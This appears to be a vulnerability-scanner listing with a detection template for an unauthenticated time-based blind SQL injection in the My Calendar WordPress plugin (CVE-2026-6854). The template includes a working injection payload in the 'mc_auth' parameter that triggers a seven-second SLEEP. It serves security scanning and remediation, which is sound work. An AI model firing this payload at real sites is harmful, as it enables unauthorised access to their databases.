My Calendar < 3.7.9 - Unauthenticated SQL Injection
CVE-2026-6854
Verified
Description
The My Calendar – Accessible Event Manager plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'mc_auth' parameter in all versions up to, and including, 3.7.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Severity
High
Exploit Probability
2%
Published Date
August 14, 2026
Template Author
pauullamm
CVE-2026-6854.yaml
id: CVE-2026-6854
info:
name: My Calendar < 3.7.9 - Unauthenticated SQL Injection
author: Pauullamm
severity: high
description: |
The My Calendar – Accessible Event Manager plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'mc_auth' parameter in all versions up to, and including, 3.7.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
impact: |
Unauthenticated attackers can extract sensitive database information, leading to data disclosure.
remediation: |
Update to the latest version of the My Calendar – Accessible Event Manager plugin.
reference:
- https://wpscan.com/vulnerability/a6466f97-4d8a-4d01-b61f-94d89da7c16b/
- https://nvd.nist.gov/vuln/detail/CVE-2026-6854
classification:
cve-id: CVE-2026-6854
epss-score: 0.01577
epss-percentile: 0.73585
cwe-id: CWE-89
metadata:
max-request: 3
verified: true
tags: cve,cve2026,sqli,wordpress,my-calendar
flow: http(1) && http(2) && http(3)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/my-calendar/readme.txt"
matchers:
- type: word
part: body
words:
- "My Calendar"
internal: true
extractors:
- type: regex
name: my_calendar_version
part: body
group: 1
regex:
- "(?mi)^Stable tag:\\s*([0-9]+\\.[0-9]+\\.[0-9]+)"
internal: true
- method: GET
path:
- "{{BaseURL}}/?to=2026-09-12&from=2026-08-13&mc-api=json"
matchers:
- type: dsl
dsl:
- "status_code >= 200"
- "contains(tolower(header), 'application/json')"
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/?to=2026-09-12&from=2026-08-13&mc-api=json&mc_auth=1%2C2)%20OR%20SLEEP%287%29--%20x"
matchers:
- type: dsl
dsl:
- "duration >= 7"
# digest: 490a00463044022075bceb6ee186136431e14cd1e27e304796f9cbf27926a0c7f377606ec37d9aa9022045949b2b6b009604877da1fb2489e0b1b89b04c7fa073b83498ae2a2f86cfaea:922c64590222798bb761d5b6d8e729507.5Severity
CVSS Metrics
CVE ID:
cve-2026-6854
CWE ID:
cwe-89
Remediation Steps
Update to the latest version of the My Calendar – Accessible Event Manager plugin.